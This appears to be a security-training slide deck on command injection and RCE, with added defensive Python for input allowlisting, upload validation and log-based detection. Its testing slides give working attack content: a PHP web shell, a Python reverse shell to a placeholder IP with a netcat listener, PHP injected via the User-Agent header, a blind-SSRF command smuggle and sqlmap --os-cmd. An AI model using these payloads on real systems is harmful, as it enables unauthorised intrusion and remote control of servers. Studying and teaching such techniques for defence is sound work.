RCE & Command Injection


Command Injection & RCE

01 Command Injection
CONTENTS

• What is Command Injection?
• How it Works
• Testing Methodology
• Impact and Mitigation
• Practical Demonstration
What is Command Injection?

• Command injection is a vulnerability that involves executing arbitrary commands on a host operating system (OS).

• Typically, the attacker injects the commands by exploiting an application vulnerability, such as insufficient input validation.


How it Works

(diagram slide; no text content)
Testing Methodology

Command Injection Methods:

• Arbitrary command injection
• Arbitrary file upload
• Insecure deserialization
• Server-side template injection (SSTI)
• XML external entity injection (XXE)


Impact

• The attacker extends the default functionality of a vulnerable application, causing it to pass commands to the system shell, without needing to inject malicious code.

• In many cases, command injection gives the attacker greater control over the target system.


Mitigation

• Don't run system commands with user-supplied input
• Use strong input validation for input passed into commands
• Use the principle of least privilege
• Update and patch applications
• Regularly test the application
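As an added example that is not part of the slides, the first three mitigations shown in working code: the vulnerable pattern (user input pasted into a shell command line) next to a hardened version that validates the value against a strict allowlist and passes it to the program as a separate argument with no shell involved. The "ping a host" feature, the function names and the hostname pattern are assumptions made for illustration.

```python
# Added example, not from the slides: the vulnerable pattern next to a hardened
# one. The "ping a host" feature, the function names and the hostname pattern
# are assumptions made for illustration.
import re
import subprocess

# VULNERABLE: the user's value is pasted into a string that a shell parses, so
# a value such as "8.8.8.8; id" runs a second command. Shown only as the
# "before" state; this function never executes anything.
def vulnerable_command_line(host: str) -> str:
    return "ping -c 1 " + host


# Hardened step 1: strict allowlist validation of what a hostname may contain.
# Anything outside letters, digits, dots and hyphens is rejected outright
# (that covers ; | & ` $ ( ) and whitespace), and the first character must be
# alphanumeric so the value can never be read as a ping option like "-f".
_HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def validate_host(host: str) -> str:
    if not _HOSTNAME_RE.fullmatch(host):
        raise ValueError("host contains characters outside the allowlist")
    return host


# Hardened step 2: pass the program and its arguments as a list and keep
# shell=False (the default), so no shell ever parses the value. The validated
# host lands in argv as exactly one argument.
def build_ping_argv(host: str) -> list[str]:
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    # Least privilege belongs around this call too: the worker that runs it
    # should be an unprivileged account that can do nothing but ping.
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    for candidate in ("example.com", "8.8.8.8; id", "-f", "`whoami`"):
        try:
            print(candidate, "->", build_ping_argv(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

The allowlist is the important part: a denylist of shell metacharacters is easy to get wrong across shells and locales, whereas describing the one shape the value is allowed to have leaves nothing to bypass. The argument list then makes the shell irrelevant even if validation were to slip.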


02 RCE

CONTENTS

• What is RCE?
• How it Works
• Testing Methodology
• Practical Demonstration
What is RCE?

• A security vulnerability that allows attackers to run arbitrary code on a remote machine by connecting to it over a public or private network.


How it Works

(diagram slide; no text content)
Testing Methodology

RCE Via File Upload:

• Open a text editor and paste the command:

<?php echo "shell";system($_GET['cmd']); ?>

• Save the file with a .php extension
• Upload the file
• Now open the uploaded file through its URL
• At the end of the URL add "?cmd=id"
• Also try other commands, e.g. "?cmd=pwd"
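The defender's side of the test above, as an added example that is not part of the slides: the checks an upload handler applies before a file is written anywhere a web server might execute it, so a file like the one described (a .php script, or a script hidden behind a double extension) is rejected. The image-only allowlist, the helper names and the sample bytes are assumptions.

```python
# Added example, not from the slides: checks a defender applies to an upload
# before storing it. The image-only allowlist, the names and the sample data
# are assumptions for illustration.
import os
import secrets

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Server-side script extensions that must never appear anywhere in the name,
# so "shell.php.jpg" is rejected even though its last extension is allowed.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
# Leading bytes of each allowed format; the content must match the extension.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    pass


def check_upload(client_name: str, data: bytes) -> str:
    """Return a server-generated file name to store `data` under, or raise."""
    if "\x00" in client_name:
        raise UploadRejected("null byte in file name")
    # Drop any client-supplied directory part, whichever separator was used.
    base = os.path.basename(client_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):
        raise UploadRejected("missing or empty extension")
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension not allowed: .{ext}")
    if any(p in SCRIPT_EXT for p in parts[:-1]):
        raise UploadRejected("script extension embedded in file name")
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match the declared type")
    # The client never chooses the stored name: a random name removes any
    # influence over the path, and the extension is the validated one.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(16)          # constructed sample
    print(check_upload("avatar.png", png))
    for name, blob in (("shell.php", b"<?php echo 1; ?>"), ("shell.php.jpg", png)):
        try:
            check_upload(name, blob)
        except UploadRejected as exc:
            print(name, "-> rejected:", exc)
```

Two deployment details complete the picture and are outside the function: store the file under a directory the web server is configured never to execute scripts from (ideally outside the document root), and serve it back with a fixed Content-Type rather than one derived from the name.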


Testing Methodology

RCE Via LFI:

• Look for the "/proc/self/environ" file; if any part of the request is stored there, continue as follows:

• After the file name, type:

&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

• In the User-Agent header add: <?php system($_GET['cmd']); ?>

• In a terminal, set up a listener (nc -lv 4444)

• Send the request
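From the detection side, as an added example that is not part of the slides: a small detector run over constructed web-server access-log lines, flagging the request features the LFI technique above depends on (a path reaching for /proc/self/environ or other traversal targets, a cmd= parameter, and PHP code arriving in the User-Agent or Referer header). It also catches the file-upload case, where an uploaded .php file is called with ?cmd=. The log format (Apache/nginx "combined"), the field names and the sample lines are assumptions.

```python
# Added example, not from the slides: detection logic over constructed
# "combined" access-log lines. Format, field names and samples are assumptions.
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
LFI_MARKERS = ("../", "..\\", "/proc/self/environ", "/etc/passwd")
CODE_MARKERS = ("<?php", "<?=")


def analyze(line: str) -> Optional[dict]:
    """Parse one log line; return its fields plus the list of reasons it was flagged."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    # Decode twice: double-encoded paths are a common way past single-decode filters.
    target = unquote(unquote(m["target"]))
    reasons = []
    if any(marker in target for marker in LFI_MARKERS):
        reasons.append("lfi-traversal")
    if "cmd" in parse_qs(urlsplit(target).query):
        reasons.append("cmd-parameter")
    if any(marker in unquote(m[h]) for h in ("ua", "referer") for marker in CODE_MARKERS):
        reasons.append("code-in-header")
    return {"ip": m["ip"], "target": target, "status": m["status"], "reasons": reasons}


def scan(lines):
    """Return the analysis records of every line that raised at least one reason."""
    return [r for r in map(analyze, lines) if r and r["reasons"]]


# Constructed sample lines (not real traffic). The second reproduces the
# environ technique; the third hits an uploaded .php file with ?cmd=.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    "203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] \"GET /index.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron&cmd=id HTTP/1.1\" 200 2048 \"-\" \"<?php system($_GET['cmd']); ?>\"",
    '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 64 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["reasons"], hit["target"])
```

A 200 status on a flagged line is the combination worth alerting on: a traversal attempt that returns 404 is noise, while a successful response to a request carrying PHP in a header suggests the include actually executed.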
Testing Methodology

RCE Via Blind SSRF:

• When we get a blind hit while hunting for SSRF, we try to escalate it to RCE:

http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net

• To escalate blind SSRF to RCE:

http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net?`whoami`
Testing Methodology

SQL Injection to RCE:

• When we get a SQL-based error on a website, we can try to run OS commands through sqlmap.

• Command:

sqlmap -u {url} --random-agent --os-cmd whoami


Thank You
